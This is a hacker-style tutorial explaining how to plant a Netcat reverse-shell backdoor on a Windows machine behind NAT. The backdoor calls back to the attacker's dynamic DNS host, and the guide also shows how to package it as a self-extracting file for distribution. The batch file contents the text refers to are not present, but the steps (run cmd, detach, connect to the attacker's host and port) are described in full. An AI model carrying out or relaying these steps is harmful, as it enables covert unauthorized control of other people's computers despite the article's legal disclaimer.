Backdooring the NAT'ed Network
by David Dunn
Two things to mention before we begin:
1.) The method I am describing here is illegal without permission from the party being backdoored and is extremely easy to trace. If you use this against anyone who would prosecute you, you will be caught and convicted. So don't.
2.) All of the methods described in this article (client, server, or both) can be recreated with almost no changes on any Linux machine using the same tools, but for the sake of time and the popularity of the Windows OS, I'm only going to cover Windows 2000 and Windows XP here.
Network Address Translation: An Introduction
Network Address Translation (or NAT) is extremely useful in today's high-bandwidth environment.
Homes and businesses connected to the Internet via cable modem or DSL can use a router running NAT to connect multiple machines to the Internet simultaneously while still only having to pay for one connection and one external IP address.
The downside to this (for anyone who is attempting to install a backdoor, that is) is that the router acts as a one-way valve, and while it will allow connections to be established by computers on the internal network trying to reach the outside, computers on the Internet cannot initiate direct connections with computers inside the network.
For this reason, it is necessary to create a backdoor that will attempt to reach us instead of one that will merely run in the background, awaiting a connection.
Part One: Setting Up Your Return Address
The idea here is that the backdoor you install is going to contact you, so the first thing you have to do is make yourself available for contact.
A good way to do this is by setting up an account with a Dynamic DNS service like No-Ip. There are several places like this and most offer some type of free service for domains that are just a sub-domain of their own (for example, yourname.no-ip.com). Just download their update utility and install it on your machine. Whenever your IP address changes, the DNS records for your domain will be automatically updated.
Once you've registered your domain and have it forwarding to your IP address, it's time to set up the server that will listen for connections from your backdoor.
For the purposes of this article, I'm going to use port 10515 for incoming connections, but you can use any port you like.
First, download Netcat for Windows from www.atstake.com/research/tools/network_utilities/nc11nt.zip and unzip it.
Next, in the same directory to which you unzipped Netcat, create a new text file, and call it: SERVER.BAT
This file should include the following:
Run this new batch file and you should see a new terminal window that reads:
In this example, 192.168.0.1 is the IP address of the machine that SERVER.BAT is running on.
If you are behind a router, you're going to need to forward the incoming port 10515 on your router to port 10515 on the machine SERVER.BAT is running on. If you don't have a router and are connected directly to the Internet, don't worry about it, you're done.
Part Two: Creating the Backdoor
So now all that's left is to create the backdoor that is going to sit on our target machine and connect to the server.
Make another new text file, and call it BACKDOOR.BAT, and include the following:
Basically, this is telling Netcat to:
- Detach from the console and run in the background.
- To execute the command: cmd
- To answer to Telnet negotiation.
- To connect to your server at yourname.no-ip.com on port 10515.
Part Three: Usage
Copy the NC.EXE and the BACKDOOR.BAT files to a directory on the target machine and run BACKDOOR.BAT.
If everything is working correctly, you'll now see a terminal window with our friendly little "You have been owned." message displayed. Feel free to close this window.
When you return to the server machine, you should now see something to the effect of:
Congratulations, you're in.
If you'd like to make the backdoor a little easier to distribute, you can compress BACKDOOR.BAT and NC.EXE in a ZIP file and use it to create a self-extracting file that will execute the BACKDOOR.BAT program when opened.
Shoutz to Mr. B and jeste|2.